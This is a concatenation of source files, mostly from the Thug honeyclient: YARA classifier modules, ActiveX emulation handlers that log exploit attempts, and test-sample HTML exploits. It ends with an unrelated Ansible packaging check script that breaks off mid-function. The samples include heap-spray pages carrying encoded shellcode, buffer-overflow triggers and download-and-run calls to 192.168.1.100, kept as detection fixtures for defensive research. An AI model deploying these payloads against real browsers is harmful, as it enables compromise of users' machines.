        """Drop all registered custom classifiers."""
        self.custom_classifiers = {}

    def reset_matches(self):
        """Forget all matches collected so far."""
        self.matches.clear()

    def handle_match_etags(self, match):
        """Promote matched string data to extra tags on the match.

        The rule's ``etags`` meta entry names string identifiers whose
        matched data (presumably short textual tokens — verify against the
        rule files) is appended to ``match.tags``.
        """
        etags = match.meta.get("etags", None)
        if etags is None:
            return

        _etags = [t.strip() for t in etags.split(",")]

        for s in match.strings:
            if s.identifier not in _etags:
                continue

            for instance in s.instances:
                data = instance.matched_data
                tag = data.decode() if isinstance(data, bytes) else data
                if tag not in match.tags:
                    match.tags.append(tag)
| 5,394
|
Python
|
.py
| 138
| 29.152174
| 87
| 0.58881
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,059
|
SampleClassifier.py
|
buffer_thug/thug/Classifier/SampleClassifier.py
|
#!/usr/bin/env python
#
# SampleClassifier.py
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307 USA
#
# Original code written by Thorsten Sick <thorsten.sick@avira.com>
# from Avira (developed for the iTES Project http://ites-project.org)
#
# Modified by Angelo Dell'Aera:
# - Designed the more generic Classifier module and embedded this
# module into such module
# - Converted to YARA rules
import logging
from .BaseClassifier import BaseClassifier
log = logging.getLogger("Thug")
class SampleClassifier(BaseClassifier):
    """Classify and filter downloaded samples with YARA rules."""

    default_rule_file = "rules/sampleclassifier.yar"
    default_filter_file = "rules/samplefilter.yar"
    _classifier = "Sample Classifier"

    def __init__(self):
        BaseClassifier.__init__(self)

    def classify(self, sample, md5):
        """Run classification rules against *sample*, logging matches by *md5*."""
        for m in self.rules.match(data=sample):
            self.matches.append((sample, m))
            self.handle_match_etags(m)
            joined_tags = ",".join(" ".join(tag.split("_")) for tag in m.tags)
            log.ThugLogging.log_classifier("sample", md5, m.rule, joined_tags, m.meta)

        # User-supplied classifiers always run, regardless of rule matches.
        for name in list(self.custom_classifiers):
            self.custom_classifiers[name](sample, md5)

    def filter(self, sample, md5):
        """Return True when at least one filter rule matches *sample*."""
        matched = False

        for m in self.filters.match(data=sample):
            joined_tags = ",".join(" ".join(tag.split("_")) for tag in m.tags)
            log.ThugLogging.log_classifier("samplefilter", md5, m.rule, joined_tags, m.meta)
            matched = True

        return matched
| 2,230
|
Python
|
.py
| 53
| 36.773585
| 86
| 0.691455
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,060
|
VBSClassifier.py
|
buffer_thug/thug/Classifier/VBSClassifier.py
|
#!/usr/bin/env python
#
# VBSClassifier.py
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307 USA
import logging
from .BaseClassifier import BaseClassifier
log = logging.getLogger("Thug")
class VBSClassifier(BaseClassifier):
    """Classify and filter VBScript code with YARA rules."""

    default_rule_file = "rules/vbsclassifier.yar"
    default_filter_file = "rules/vbsfilter.yar"
    _classifier = "VBS Classifier"

    def __init__(self):
        BaseClassifier.__init__(self)

    def classify(self, url, script):
        """Run classification rules against *script*, logging each match."""
        for m in self.rules.match(data=script):
            self.matches.append((url, m))

            if self.discard_url_match(url, m):  # pragma: no cover
                continue

            self.handle_match_etags(m)
            joined_tags = ",".join(" ".join(tag.split("_")) for tag in m.tags)
            log.ThugLogging.log_classifier("vbs", url, m.rule, joined_tags, m.meta)

        # User-supplied classifiers always run, regardless of rule matches.
        for name in list(self.custom_classifiers):
            self.custom_classifiers[name](url, script)

    def filter(self, url, script):
        """Return True when at least one filter rule matches *script*."""
        matched = False

        for m in self.filters.match(data=script):
            joined_tags = ",".join(" ".join(tag.split("_")) for tag in m.tags)
            log.ThugLogging.log_classifier("vbsfilter", url, m.rule, joined_tags, m.meta)
            matched = True

        return matched
| 2,002
|
Python
|
.py
| 47
| 36.12766
| 86
| 0.669413
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,061
|
HTMLClassifier.py
|
buffer_thug/thug/Classifier/HTMLClassifier.py
|
#!/usr/bin/env python
#
# HTMLClassifier.py
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307 USA
import logging
from .BaseClassifier import BaseClassifier
log = logging.getLogger("Thug")
class HTMLClassifier(BaseClassifier):
    """Classify and filter HTML content with YARA rules."""

    default_rule_file = "rules/htmlclassifier.yar"
    default_filter_file = "rules/htmlfilter.yar"
    _classifier = "HTML Classifier"

    def __init__(self):
        BaseClassifier.__init__(self)

    def classify(self, url, html):
        """Run classification rules against *html*, skipping ignorable pages."""
        # Pages flagged by the HTML inspector's ignore handler are not classified.
        if log.HTMLInspector.check_ignore_handler(html):
            return

        for m in self.rules.match(data=html):
            entry = (url, m)

            # Skip (url, match) pairs already seen in this session.
            if entry in self.matches:
                continue

            self.matches.append(entry)

            if self.discard_url_match(url, m):  # pragma: no cover
                continue

            self.handle_match_etags(m)
            joined_tags = ",".join(" ".join(tag.split("_")) for tag in m.tags)
            log.ThugLogging.log_classifier("html", url, m.rule, joined_tags, m.meta)

        # User-supplied classifiers always run, regardless of rule matches.
        for name in list(self.custom_classifiers):
            self.custom_classifiers[name](url, html)

    def filter(self, url, html):
        """Return True when at least one filter rule matches *html*."""
        matched = False

        for m in self.filters.match(data=html):
            joined_tags = ",".join(" ".join(tag.split("_")) for tag in m.tags)
            log.ThugLogging.log_classifier("htmlfilter", url, m.rule, joined_tags, m.meta)
            matched = True

        return matched
| 2,147
|
Python
|
.py
| 51
| 35.078431
| 86
| 0.660259
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,062
|
URLClassifier.py
|
buffer_thug/thug/Classifier/URLClassifier.py
|
#!/usr/bin/env python
#
# URLClassifier.py
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307 USA
#
# Original code written by Thorsten Sick <thorsten.sick@avira.com>
# from Avira (developed for the iTES Project http://ites-project.org)
#
# Modified by Angelo Dell'Aera:
# - Designed the more generic Classifier module and embedded this
# module into such module
# - Converted to YARA rules
import logging
from .BaseClassifier import BaseClassifier
log = logging.getLogger("Thug")
class URLClassifier(BaseClassifier):
    """Classify and filter URLs with YARA rules."""

    default_rule_file = "rules/urlclassifier.yar"
    default_filter_file = "rules/urlfilter.yar"
    _classifier = "URL Classifier"

    def __init__(self):
        BaseClassifier.__init__(self)

    def classify(self, url):
        """Run classification rules against *url*, logging each match."""
        # data: URIs are never classified.
        if log.HTTPSession.is_data_uri(url):
            return

        for m in self.rules.match(data=url):
            self.matches.append((url, m))

            if self.discard_url_match(url, m):
                continue

            self.handle_match_etags(m)
            joined_tags = ",".join(" ".join(tag.split("_")) for tag in m.tags)
            log.ThugLogging.log_classifier("url", url, m.rule, joined_tags, m.meta)

        # User-supplied classifiers always run, regardless of rule matches.
        for name in list(self.custom_classifiers):
            self.custom_classifiers[name](url)

    def filter(self, url):
        """Return True when at least one filter rule matches *url*."""
        matched = False

        for m in self.filters.match(data=url):
            joined_tags = ",".join(" ".join(tag.split("_")) for tag in m.tags)
            log.ThugLogging.log_classifier("urlfilter", url, m.rule, joined_tags, m.meta)
            matched = True

        return matched
| 2,318
|
Python
|
.py
| 57
| 34.789474
| 86
| 0.676457
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,063
|
ZenturiProgramCheckerAttack3.htm
|
buffer_thug/tests/samples/exploits/ZenturiProgramCheckerAttack3.htm
|
<HTML>
<BODY>
<object id=boom classid="clsid:{59DBDDA6-9A80-42A4-B824-9BC50CC172F5}"></object>
<SCRIPT>
boom.NavigateUrl("http://192.168.1.100/putty.exe");
</SCRIPT>
</BODY>
</HTML>
| 190
|
Python
|
.tac
| 8
| 21.75
| 82
| 0.701657
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,064
|
MicrosoftWorks7Attack.htm
|
buffer_thug/tests/samples/exploits/MicrosoftWorks7Attack.htm
|
<html>
<head>
<title>Microsoft Works 7 WkImgSrv.dll Exploit</title>
Coded by lhoang8500
lhoang8500[at]gmail[dot]com
BKIS Center - Vietnam
<SCRIPT language="javascript">
var heapSprayToAddress = 0x0A0A0A0A;
var payLoadCode =
unescape("%u9090%u9090%u9090%u9090%u9090%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
var heapBlockSize = 0x400000;
var payLoadSize = payLoadCode.length * 2;
var spraySlideSize = heapBlockSize - (payLoadSize+0x38);
var spraySlide = unescape("%u0A0A%u0A0A");
spraySlide = getSpraySlide(spraySlide,spraySlideSize);
heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;
memory = new Array();
for (i=0;i<heapBlocks;i++)
{
memory[i] = spraySlide + payLoadCode;
}
function getSpraySlide(spraySlide, spraySlideSize)
{
while (spraySlide.length*2<spraySlideSize)
{
spraySlide += spraySlide;
}
spraySlide = spraySlide.substring(0,spraySlideSize/2);
return spraySlide;
}
</script>
<script language="JavaScript">
function payload() {
var num = 168430090;
obj.WksPictureInterface = num;
}
</script>
</head>
<body onload="JavaScript: return payload();">
<object classid="clsid:00E1DB59-6EFD-4CE7-8C0A-2DA3BCAAD9C6" id="obj">
</object>
</body>
</html>
| 1,600
|
Python
|
.tac
| 43
| 34.511628
| 446
| 0.772875
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,065
|
ZenturiProgramCheckerAttack2.htm
|
buffer_thug/tests/samples/exploits/ZenturiProgramCheckerAttack2.htm
|
<HTML>
<BODY>
<object id=boom classid="clsid:{59DBDDA6-9A80-42A4-B824-9BC50CC172F5}"></object>
<SCRIPT>
boom.DownloadFile("http://192.168.1.100/putty.exe", "putty.exe");
</SCRIPT>
</BODY>
</HTML>
| 204
|
Python
|
.tac
| 8
| 23.5
| 82
| 0.697436
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,066
|
RediffBolDownloaderAttack.htm
|
buffer_thug/tests/samples/exploits/RediffBolDownloaderAttack.htm
|
<html>
<body>
<OBJECT id="rboldwn" WIDTH=445 HEIGHT=40 classid="clsid:BADA82CB-BF48-4D76-9611-78E2C6F49F03" >
</OBJECT>
<script language="javascript">
rboldwn.url = "file://C:/WINNT/Notepad.exe"
rboldwn.fontsize = 14
rboldwn.barcolor = 'EE4E00'
rboldwn.start = "start"
</script>
</body>
</html>
| 299
|
Python
|
.tac
| 12
| 23.583333
| 95
| 0.749117
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,067
|
ZenturiProgramCheckerAttack.htm
|
buffer_thug/tests/samples/exploits/ZenturiProgramCheckerAttack.htm
|
<BODY>
<object id=boom classid="clsid:{59DBDDA6-9A80-42A4-B824-9BC50CC172F5}"></object>
<h4>Will Dormann from CERT/CC is credited with the discovery.</H4><br>
<h4>This exploits executes calc.exe</h4>
<SCRIPT>
var payLoadCode=unescape( "%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800" +
"%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" +
"%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" +
"%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" +
"%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000" +
"%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040" +
"%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD" +
"%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40" +
"%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18" +
"%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0" +
"%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B" +
"%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24" +
"%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9" +
"%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C" +
"%u652E%u6578%u9000");
var spraySlide = unescape("%u9090%u9090");
var heapSprayToAddress = 0x0a0a0a0a;
function Tryme()
{
var size_buff = 2272;
var x = unescape("%0a%0a%0a%0a");
while (x.length<size_buff) x += x;
x = x.substring(0,size_buff);
boom.DebugMsgLog(x);
}
function getSpraySlide(spraySlide, spraySlideSize)
{
while (spraySlide.length*2<spraySlideSize)
{
spraySlide += spraySlide;
}
spraySlide = spraySlide.substring(0,spraySlideSize/2);
return (spraySlide);
}
var heapBlockSize = 0x400000;
var SizeOfHeapDataMoreover = 0x5;
var payLoadSize = (payLoadCode.length * 2);
var spraySlideSize = heapBlockSize - (payLoadSize + SizeOfHeapDataMoreover);
var heapBlocks = (heapSprayToAddress+heapBlockSize)/heapBlockSize;
var memory = new Array();
spraySlide = getSpraySlide(spraySlide,spraySlideSize);
for (i=0;i<heapBlocks;i++)
{
memory[i] = spraySlide + payLoadCode;
}
</SCRIPT>
<input language=JavaScript onclick=Tryme() type=button value="Launch Exploit">
</BODY>
</HTML>
| 2,666
|
Python
|
.tac
| 54
| 38.333333
| 90
| 0.62158
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,068
|
CreativeSoftAttack.htm
|
buffer_thug/tests/samples/exploits/CreativeSoftAttack.htm
|
<html>
<object classid='clsid:0A5FD7C5-A45C-49FC-ADB5-9952547D5715' id='obj1'></object>
<script language='javascript'>
var sc01 = unescape("%u9090%u9090"+
"%ue8fcD%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b"+
"%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca"+
"%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b"+
"%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040"+
"%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0"+
"%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%uf068%u048a"+
"%u685f%ufe98%u0e8a%uff57%u63e7%u6c61c");
var mainblk = unescape("%u0c0c%u0c0c");
var hdr = 20;
var slck = hdr + sc01.length;
while (mainblk.length < slck) mainblk += mainblk;
var fillblk = mainblk.substring(0,slck);
var blk = mainblk.substring(0,mainblk.length - slck);
while (blk.length + slck < 0x40000) blk = blk + blk + fillblk;
var memory = new Array();
for (i = 0; i < 400; i++){ memory[i] = blk + sc01 }
var buf = '';
while (buf.length < 512) buf = buf + unescape("%09"); // TAB - 0x09 works best here.
obj1.cachefolder = buf;
</script>
</html>
| 1,090
|
Python
|
.tac
| 25
| 42.48
| 84
| 0.728128
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,069
|
AolAttack.html
|
buffer_thug/tests/samples/exploits/AolAttack.html
|
<html>
<body>
<script>
var obj = document.createElement("object");
obj.setAttribute("classid", "clsid:189504B8-50D1-4AA8-B4D6-95C8F58A6414");
obj.LinkSBIcons();
</script>
</body>
</html>
| 190
|
Python
|
.tac
| 9
| 19.777778
| 75
| 0.740331
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,070
|
ZenturiProgramCheckerAttack.py
|
buffer_thug/thug/ActiveX/modules/ZenturiProgramCheckerAttack.py
|
import logging
log = logging.getLogger("Thug")
def DownloadFile(self, *arg):
    """Log the DownloadFile attack and emulate the download of the payload.

    arg[0] is the remote URL, arg[1] the local filename the exploit asked for.
    """
    url, filename = arg[0], arg[1]
    thug_log = log.ThugLogging

    thug_log.add_behavior_warn(
        "[ZenturiProgramChecker ActiveX] Attack in DownloadFile function"
    )
    thug_log.add_behavior_warn(
        f"[ZenturiProgramChecker ActiveX] Downloading from {url}"
    )
    thug_log.add_behavior_warn(
        f"[ZenturiProgramChecker ActiveX] Saving downloaded file as: {filename}"
    )
    thug_log.log_exploit_event(
        self._window.url,
        "ZenturiProgramChecker ActiveX",
        "DownloadFile function",
        forward=False,
        data={"url": url, "filename": filename},
    )

    try:
        # Best-effort fetch of the payload; failures are logged, not raised.
        self._window._navigator.fetch(
            url, redirect_type="ZenturiProgramChecker Exploit"
        )
    except Exception:  # pylint:disable=broad-except
        thug_log.add_behavior_warn(
            "[ZenturiProgramChecker ActiveX] Fetch failed"
        )
def DebugMsgLog(self, *arg):
    """Log the DebugMsgLog attack and scan its first argument for shellcode."""
    thug_log = log.ThugLogging

    thug_log.add_behavior_warn(
        "[ZenturiProgramChecker ActiveX] Attack in DebugMsgLog function"
    )
    thug_log.log_exploit_event(
        self._window.url,
        "ZenturiProgramChecker ActiveX",
        "Attack in DebugMsgLog function",
    )
    thug_log.Shellcode.check_shellcode(arg[0])
def NavigateUrl(self, *arg):
    """Log the NavigateUrl attack and scan its first argument for shellcode."""
    thug_log = log.ThugLogging

    thug_log.add_behavior_warn(
        "[ZenturiProgramChecker ActiveX] Attack in NavigateUrl function"
    )
    thug_log.log_exploit_event(
        self._window.url,
        "ZenturiProgramChecker ActiveX",
        "Attack in NavigateUrl function",
    )
    thug_log.Shellcode.check_shellcode(arg[0])
| 1,660
|
Python
|
.tac
| 47
| 28.510638
| 78
| 0.681421
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,071
|
RediffBolDownloaderAttack.py
|
buffer_thug/thug/ActiveX/modules/RediffBolDownloaderAttack.py
|
import logging
log = logging.getLogger("Thug")
def Seturl(self, val):
    """Store the url property value, log the overflow attempt and scan for shellcode."""
    thug_log = log.ThugLogging

    # Bypass any property setter machinery and store the raw value.
    self.__dict__["url"] = val

    thug_log.log_exploit_event(
        self._window.url, "RediffBolDownloader ActiveX", "Overflow in url property"
    )
    thug_log.Shellcode.check_shellcode(val)
| 285
|
Python
|
.tac
| 8
| 31.125
| 83
| 0.714286
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,072
|
AOLAttack.py
|
buffer_thug/thug/ActiveX/modules/AOLAttack.py
|
import logging
log = logging.getLogger("Thug")
def LinkSBIcons(self):
    """Log the AOL ActiveX LinkSBIcons exploit (CVE-2006-5820)."""
    thug_log = log.ThugLogging

    thug_log.log_exploit_event(
        self._window.url,
        "AOL ActiveX",
        "Attack in LinkSBIcons function",
        cve="CVE-2006-5820",
    )
    thug_log.log_classifier("exploit", thug_log.url, "CVE-2006-5820")
| 323
|
Python
|
.tac
| 10
| 26.5
| 83
| 0.676375
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,073
|
CreativeSoftAttack.py
|
buffer_thug/thug/ActiveX/modules/CreativeSoftAttack.py
|
import logging
log = logging.getLogger("Thug")
def Setcachefolder(self, val):  # pylint:disable=unused-argument
    """Log the cachefolder property overflow attempt (the value is not inspected)."""
    log.ThugLogging.log_exploit_event(
        self._window.url,
        "CreativeSoft ActiveX",
        "Overflow in cachefolder property",
    )
| 245
|
Python
|
.tac
| 6
| 36.666667
| 84
| 0.75
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,074
|
MicrosoftWorks7Attack.py
|
buffer_thug/thug/ActiveX/modules/MicrosoftWorks7Attack.py
|
import logging
log = logging.getLogger("Thug")
def SetWksPictureInterface(self, val):
    """Store the property value and log the WksPictureInterface overflow attempt."""
    # Bypass any property setter machinery and store the raw value.
    self.__dict__["WksPictureInterface"] = val

    log.ThugLogging.log_exploit_event(
        self._window.url,
        "MicrosoftWorks7 ActiveX",
        "Overflow in WksPictureInterface property",
    )
| 295
|
Python
|
.tac
| 9
| 27.333333
| 51
| 0.705674
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,075
|
package-data.py
|
ansible_ansible/test/sanity/code-smell/package-data.py
|
"""Verify the contents of the built sdist and wheel."""
from __future__ import annotations
import contextlib
import fnmatch
import os
import pathlib
import re
import shutil
import subprocess
import sys
import tarfile
import tempfile
import typing as t
import zipfile
from ansible.release import __version__
def collect_sdist_files(complete_file_list: list[str]) -> list[str]:
    """Return a list of files which should be present in the sdist."""
    ignore_patterns = (
        '.azure-pipelines/*',
        '.cherry_picker.toml',
        '.git*',
        '.mailmap',
        'bin/*',
        'changelogs/README.md',
        'changelogs/config.yaml',
        'changelogs/fragments/*',
        'hacking/*',
    )

    def ignored(path: str) -> bool:
        # A path is excluded when any of the ignore globs matches it.
        return any(fnmatch.fnmatch(path, pattern) for pattern in ignore_patterns)

    sdist_files = [path for path in complete_file_list if not ignored(path)]

    # Metadata files generated by setuptools during the sdist build.
    egg_info = (
        'PKG-INFO',
        'SOURCES.txt',
        'dependency_links.txt',
        'entry_points.txt',
        'requires.txt',
        'top_level.txt',
    )

    sdist_files.append('PKG-INFO')
    sdist_files.append('setup.cfg')
    sdist_files.extend(f'ansible_core.egg-info/{name}' for name in egg_info)

    return sdist_files
def collect_wheel_files(complete_file_list: list[str]) -> list[str]:
    """Return a list of files which should be present in the wheel."""
    wheel_files: list[str] = []
    license_files: list[str] = []

    for path in complete_file_list:
        if path.startswith('licenses/'):
            license_files.append(os.path.relpath(path, 'licenses'))

        # Only the ansible and ansible_test packages ship in the wheel.
        if path.startswith('lib/ansible/'):
            wheel_files.append(os.path.relpath(path, 'lib'))
        elif path.startswith('test/lib/ansible_test/'):
            wheel_files.append(os.path.relpath(path, 'test/lib'))

    # Metadata written into the wheel's .dist-info directory.
    dist_info = [
        'COPYING',
        'METADATA',
        'RECORD',
        'WHEEL',
        'entry_points.txt',
        'top_level.txt',
    ] + license_files

    wheel_files.extend(f'ansible_core-{__version__}.dist-info/{name}' for name in dist_info)

    return wheel_files
@contextlib.contextmanager
def clean_repository(complete_file_list: list[str]) -> t.Generator[str, None, None]:
    """Copy the files to a temporary directory and yield the path.

    Only the listed files are copied, so the temporary tree contains
    exactly what was reported (e.g. by ansible-test), not untracked files.
    """
    directories = sorted(set(os.path.dirname(path) for path in complete_file_list))

    # The repository root appears as '' and must not be created as a directory.
    # Remove it conditionally: the original unconditional list.remove('') raised
    # ValueError when the file list contained no top-level files.
    if '' in directories:
        directories.remove('')

    with tempfile.TemporaryDirectory() as temp_dir:
        for directory in directories:
            os.makedirs(os.path.join(temp_dir, directory))

        for path in complete_file_list:
            # follow_symlinks=False preserves symlinks instead of copying targets.
            shutil.copy2(path, os.path.join(temp_dir, path), follow_symlinks=False)

        yield temp_dir
def build(source_dir: str, tmp_dir: str) -> tuple[pathlib.Path, pathlib.Path]:
    """Create a sdist and wheel."""
    command = [sys.executable, '-m', 'build', '--outdir', tmp_dir]

    result = subprocess.run(  # pylint: disable=subprocess-run-check
        command,
        stdin=subprocess.DEVNULL,
        capture_output=True,
        text=True,
        cwd=source_dir,
    )

    if result.returncode != 0:
        raise RuntimeError(f'build failed:\n{result.stderr}\n{result.stdout}')

    artifacts = list(pathlib.Path(tmp_dir).iterdir())

    # A successful build produces exactly one sdist and one wheel.
    if len(artifacts) != 2:
        raise RuntimeError(f'build resulted in {len(artifacts)} items instead of 2')

    sdist_path = [item for item in artifacts if item.suffix == '.gz'][0]
    wheel_path = [item for item in artifacts if item.suffix == '.whl'][0]

    return sdist_path, wheel_path
def list_sdist(path: pathlib.Path) -> list[str]:
    """Return a list of the files in the sdist."""
    with tarfile.open(path) as sdist:
        regular_members = [m for m in sdist.getmembers() if not m.isdir()]
        # Drop the leading "{name}-{version}/" component from each entry.
        paths = ['/'.join(pathlib.Path(m.path).parts[1:]) for m in regular_members]

    return paths
def list_wheel(path: pathlib.Path) -> list[str]:
    """Return a list of the files in the wheel."""
    with zipfile.ZipFile(path) as wheel:
        # Directory entries are excluded; only real files are reported.
        paths = [entry.filename for entry in wheel.filelist if not entry.is_dir()]

    return paths
def check_files(source: str, expected: list[str], actual: list[str]) -> list[str]:
    """Verify the expected files exist and no extra files exist.

    Returns one error string per missing or unexpected path, missing
    entries first, each group sorted.
    """
    expected_set = set(expected)
    actual_set = set(actual)

    errors = [f'{path}: missing from {source}' for path in sorted(expected_set - actual_set)]
    errors += [f'{path}: unexpected in {source}' for path in sorted(actual_set - expected_set)]

    return errors
def main() -> None:
    """Main program entry point."""
    # File list comes from the command line, or from stdin when not given.
    complete_file_list = sys.argv[1:] or sys.stdin.read().splitlines()

    python_version = '.'.join(map(str, sys.version_info[:2]))
    python_min = os.environ['ANSIBLE_TEST_MIN_PYTHON']
    python_max = os.environ['ANSIBLE_TEST_MAX_PYTHON']

    # The lower setuptools bound is exercised on the minimum Python,
    # the upper bound on the maximum Python.
    if python_version == python_min:
        use_upper_setuptools_version = False
    elif python_version == python_max:
        use_upper_setuptools_version = True
    else:
        raise RuntimeError(f'Python version {python_version} is neither the minimum {python_min} or the maximum {python_max}.')

    for error in check_build(complete_file_list, use_upper_setuptools_version):
        print(error)
def set_setuptools_version(repo_dir: str, use_upper_version: bool) -> str:
    """Pin the setuptools requirement in pyproject.toml to a single version.

    Rewrites the ``requires = ["setuptools >= X, <= Y"]`` line so both
    bounds equal Y when *use_upper_version* is true, otherwise X.
    Returns the version that was pinned.
    """
    pyproject_toml = pathlib.Path(repo_dir) / 'pyproject.toml'
    current = pyproject_toml.read_text()

    pattern = re.compile(
        r'^(?P<begin>requires = \["setuptools >= )(?P<lower>[^,]+)(?P<middle>, <= )(?P<upper>[^"]+)(?P<end>".*)$',
        re.MULTILINE,
    )
    match = pattern.search(current)

    if not match:
        raise RuntimeError(f"Unable to find the 'requires' entry in: {pyproject_toml}")

    requested_version = match.group('upper' if use_upper_version else 'lower')

    updated = pattern.sub(
        fr'\g<begin>{requested_version}\g<middle>{requested_version}\g<end>',
        current,
    )

    # A no-op substitution means the rewrite silently failed.
    if current == updated:
        raise RuntimeError("Failed to set the setuptools version.")

    pyproject_toml.write_text(updated)

    return requested_version
def check_build(complete_file_list: list[str], use_upper_setuptools_version: bool) -> list[str]:
    """Build the sdist and wheel from a pristine checkout and verify their contents.

    :param complete_file_list: every file path known to the source tree (as reported by ansible-test)
    :param use_upper_setuptools_version: pin the build to the upper setuptools bound instead of the lower one
    :returns: error strings, each suffixed with the setuptools version that was used
    """
    errors: list[str] = []
    complete_file_list = list(complete_file_list)  # avoid mutation of input
    # Limit visible files to those reported by ansible-test.
    # This avoids including files which are not committed to git.
    with clean_repository(complete_file_list) as clean_repo_dir:
        setuptools_version = set_setuptools_version(clean_repo_dir, use_upper_setuptools_version)
        if __version__.endswith('.dev0'):
            # Make sure a changelog exists for this version when testing from devel.
            # When testing from a stable branch the changelog will already exist.
            major_minor_version = '.'.join(__version__.split('.')[:2])
            changelog_path = f'changelogs/CHANGELOG-v{major_minor_version}.rst'
